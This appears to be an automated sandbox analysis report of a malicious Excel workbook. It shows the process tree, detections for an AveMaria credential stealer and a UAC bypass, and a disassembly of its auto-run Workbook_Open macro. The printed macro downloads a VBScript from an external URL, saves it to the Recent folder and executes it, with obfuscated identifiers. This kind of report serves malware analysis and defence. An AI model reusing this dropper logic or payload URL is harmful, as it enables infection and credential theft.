                                              Data Ascii: WCA5y+tE71ewkkuhE/vKEo3Qipkv+dJfa52SQuFmpMtJMDRJAXi2oTloURkrIihac+Fq0P4d5c+cbzhXV+qNGaKmxZiLsBdTm2T5ALXuBYQ6SDdjJBb9ve4HNoI53OpNHO0yWXUUiiiDXLzKmJzCFDc/0jAgSPBbVz9JrIG9uEvDNv4JYixbPhjK7eJ+xFC6ItJxtBh3H5kKCYsVpa5UpnBT4wCE3t9dOkYo1RcV4x1l67ZRMaMjJbT9Dy8IGPR


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:07:51:47
                                              Start date:14/12/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13f150000
                                              File size:28'253'536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:4
                                              Start time:07:51:54
                                              Start date:14/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs"
                                              Imagebase:0xff850000
                                              File size:168'960 bytes
                                              MD5 hash:045451FA238A75305CC26AC982472367
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:07:51:57
                                              Start date:14/12/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                              Imagebase:0x13ff90000
                                              File size:1'423'704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:8
                                              Start time:07:53:02
                                              Start date:14/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe"
                                              Imagebase:0x150000
                                              File size:395'776 bytes
                                              MD5 hash:3871A95491C97785A2CBA0C068A9ED4E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:07:53:02
                                              Start date:14/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                                              Imagebase:0x150000
                                              File size:395'776 bytes
                                              MD5 hash:3871A95491C97785A2CBA0C068A9ED4E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:07:53:02
                                              Start date:14/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                                              Imagebase:0x150000
                                              File size:395'776 bytes
                                              MD5 hash:3871A95491C97785A2CBA0C068A9ED4E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Disassembly

                                              Code Analysis

                                              Call Graph

                                              Module: Module1

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Module1"

                                              Non-Executed Functions

                                              Subroutine

                                              bookAPIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

                                              LineInstructionMeta Information
                                              2

                                              Sub book()

                                              4

                                              End Sub

                                              Module: Sheet1

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet1"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: Sheet2

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet2"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: Sheet3

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet3"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: ThisWorkbook

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "ThisWorkbook"

                                              2

                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Executed Functions

                                              Subroutine

                                              Workbook_OpenAPIs: 26, Strings: 9, Number of lines: 32, Relevance: 100.032

                                              APIsMeta Information

                                              Chr

                                              CreateObject

                                              		CreateObject("WScript.Shell")

                                              SpecialFolders

                                              CreateObject

                                              		CreateObject("microsoft.xmlhttp")

                                              CreateObject

                                              		CreateObject("Shell.Application")

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Len

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: InStr

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              Open

                                              		IXMLHTTPRequest.Open("get","https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs",False)

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Len

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: InStr

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              send

                                              responseBody

                                              Status

                                              		IXMLHTTPRequest.Status() -> 200

                                              CreateObject

                                              		CreateObject("adodb.stream")

                                              Open

                                              		Stream.Open()

                                              Type

                                              Write

                                              		Stream.Write(??????????\xfffd?????????????\xfffd??????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd????????????????????????\xfffd?????\xfffd????????????????????????\xfffd??????\xfffd??????\xfffd???????????\xfffd?????\xfffd??????\xfffd?????\xfffd???????????\xfffd????????????????????????\xfffd???????????????????????????\xfffd?????????????????????????????????????\xfffd?????????????\xfffd?????\xfffd????????????????????????\xfffd?????\xfffd??????\xfffd?????\xfffd?????\xfffd????????????\xfffd??????\xfffd?????????????????\xfffd??????????????????????????????????????\xfffd????????????\xfffd?????\xfffd?????\xfffd??????????????????\xfffd??????\xfffd??????\xfffd?????\xfffd?????\xfffd?????\xfffd?????\xfffd????????????????????????\xfffd?????\xfffd????????????\xfffd?????????????????????????\xfffd??????????????????????????????\xfffd????????????????????????\xfffd????????????????????????????????????????????\xfffd??????\xfffd??????\xfffd??????\xfffd??????????????????\xfffd???????????\xfffd????????????????????????\xfffd??????\xfffd??????\xfffd??????\xfffd??????\xfffd??????\xfffd??????????????????\xfffd????????????\xfffd????????????\xfffd?????????????????????????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd????????????\xfffd?????\xfffd??????\xfffd??????\xfffd?????\xfffd??????\xfffd?????\xfffd???????????????????\xfffd????????????????????????\xfffd????????????????????????????????\xfffd?????\xfffd??????\xfffd??????\xfffd?????????????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd?????\xfffd???????????\xfffd????????????\xfffd?????\xfffd??????\xfffd???????????????????\xfffd????????????\xfffd?????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????\xfffd????????????????????????\xfffd?????\xfffd??????????????????\xfffd??????????\xfffd????????????\xfffd?????\xfffd??????\xfffd??????\xfffd?????\xfffd?????\xfffd?????\xfffd?????\xfffd???????????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd???????????\xfffd??????\xfffd??????????????????\xfffd??????\xfffd???????????????????????????????????????\xfffd??????\xfffd?????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd??????\xfffd?????\xfffd??????\xfffd??????\xfffd??????\xfffd?????\xfffd??????\xfffd??????\xfffd?????\xfffd????????????\xfffd?????????????????????????\xfffd?????????????????????????\xfffd????????????\xfffd??????\xfffd??????\xfffd???????????\xfffd????????????????????????????????????????????????????????????????????????????????\xfffd?????\xfffd????????????\xfffd?????\xfffd????????????????????????????????????????????\xfffd??????\xfffd?????\xfffd???????????????????\xfffd???????????\xfffd?????\xfffd?????????????\xfffd?????\xfffd???????????????????\xfffd????????????\xfffd??????????????????????????????????????\xfffd???????????\xfffd?????????????????????????????????????\xfffd????????????\xfffd?????????????\xfffd?????????????????\xfffd?????\xfffd???????????\xfffd?????\xfffd????????????\xfffd?????\xfffd?????????????\xfffd???????????\xfffd?????????????\xfffd???????????\xfffd?????????????????\xfffd??????\xfffd??????\xfffd???????????\xfffd?????\xfffd????????????\xfffd???????????????????\xfffd?????\xfffd??????\xfffd?????\xfffd??????\xfffd????????????\xfffd?????\xfffd?????\xfffd???????????\xfffd????????????????????????????????????????????\xfffd???????????\xfffd?????\xfffd?????????????\xfffd?????\xfffd?????\xfffd?????????????????????????????????????????????????????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd?????????????????????????\xfffd????????????\xfffd?????????????????????????\xfffd????????????????????????\xfffd?????????????????????????????????????\xfffd?????\xfffd??????\xfffd?????\xfffd?????\xfffd?????????????????????????????????????????????\xfffd?????????????????????????\xfffd????????????\xfffd????????????\xfffd???????????????????\xfffd?????\xfffd????????????\xfffd????????????\xfffd??????\xfffd??????\xfffd?????\xfffd?????\xfffd??????\xfffd????????????\xfffd?????????????????????????\xfffd??????\xfffd?????????????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd????????????\xfffd???????????\xfffd???????????????????????????????????????\xfffd??????\xfffd??????\xfffd?????????????????????????\xfffd?????\xfffd?????\xfffd??????????????????\xfffd?????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd??????????????????\xfffd???????????\xfffd??????\xfffd?????\xfffd?????\xfffd????????????\xfffd???????????\xfffd????????????\xfffd??????\xfffd??????\xfffd?????\xfffd??????\xfffd?????\xfffd?????\xfffd???????????????????\xfffd??????????????????????????\xfffd??????\xfffd??????\xfffd?????\xfffd??????\xfffd??????\xfffd??????\xfffd??????\xfffd???????????????????????????????\xfffd??????\xfffd?????????????????????????\xfffd????????????????????????\xfffd?????\xfffd???????????????????\xfffd??????\xfffd?????\xfffd???????????????????\xfffd????????????????????????????????\xfffd??????????????????\xfffd?????\xfffd??????\xfffd????????????????????????????????????????????????\xfffd?????\xfffd??????\xfffd??????\xfffd??????\xfffd?????\xfffd??????????????????\xfffd????????????\xfffd????????????\xfffd?????\xfffd????????????\xfffd????????????????????????????????\xfffd??????\xfffd??????\xfffd??????????????????????????????\xfffd??????\xfffd??????????????????????????????\xfffd??????????????????\xfffd???????????????????????\xfffd??????\xfffd????????????????????????\xfffd?????????????????\xfffd???????????\xfffd??????\xfffd?????????????\xfffd??????\xfffd?????\xfffd?????\xfffd??????????????????\xfffd?????\xfffd???????????????????????\xfffd?????????????\xfffd???????????????????????\xfffd?????????????????????????\xfffd?????????????????\xfffd?????\xfffd??????)

                                              SaveToFile

                                              Close

                                              Open

                                              		IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs")
                                              StringsDecrypted Strings
                                              "200"
                                              "WScript.Shell"
                                              "Recent"
                                              "microsoft.xmlhttp"
                                              "Shell.Application"
                                              "get"
                                              "h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xc2\xdbgdh\xc3\xdcjh\xdcd\xd5\xc3jh\xdc\xd5dgj\xc3/\xd5\xd6\xdch\xc0gdhg\xd6\xd6jw\xd6qw\xd4gw\xc2\xd4wg/vb\xd5\xc3jzbdkj\xd5bg\xc3z\xd5kld\xc3bg\xd5/\xc1\xc3h\xdbd\xc3hgj\xd5\xdbg\xc3h\xdbz.vb\xd5"
                                              "adodb.stream"
                                              "adodb.stream"
                                              LineInstructionMeta Information
                                              9

                                              Private Sub Workbook_Open()

                                              10

                                              Dim WshShell as Object

                                              executed
                                              11

                                              Dim JUvyuihkbSpecialPathKBJKfgh as String

                                              12

                                              Dim \xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2 as Integer

                                              13

                                              \xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2 = Chr(50) + Chr(48) + Chr(48)

                                              Chr

                                              16

                                              Set WshShell = CreateObject("WScript.Shell")

                                              CreateObject("WScript.Shell")

                                              executed
                                              17

                                              JUvyuihkbSpecialPathKBJKfgh = WshShell.SpecialFolders("Recent")

                                              SpecialFolders

                                              18

                                              Dim \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae

                                              19

                                              Dim \xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae

                                              20

                                              Dim \xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab\xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf\xac\xaa\xbf\xa1\xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6

                                              21

                                              Dim \xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab

                                              22

                                              Dim \xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4

                                              23

                                              Dim \xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4 as Integer

                                              24

                                              Dim \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3

                                              25

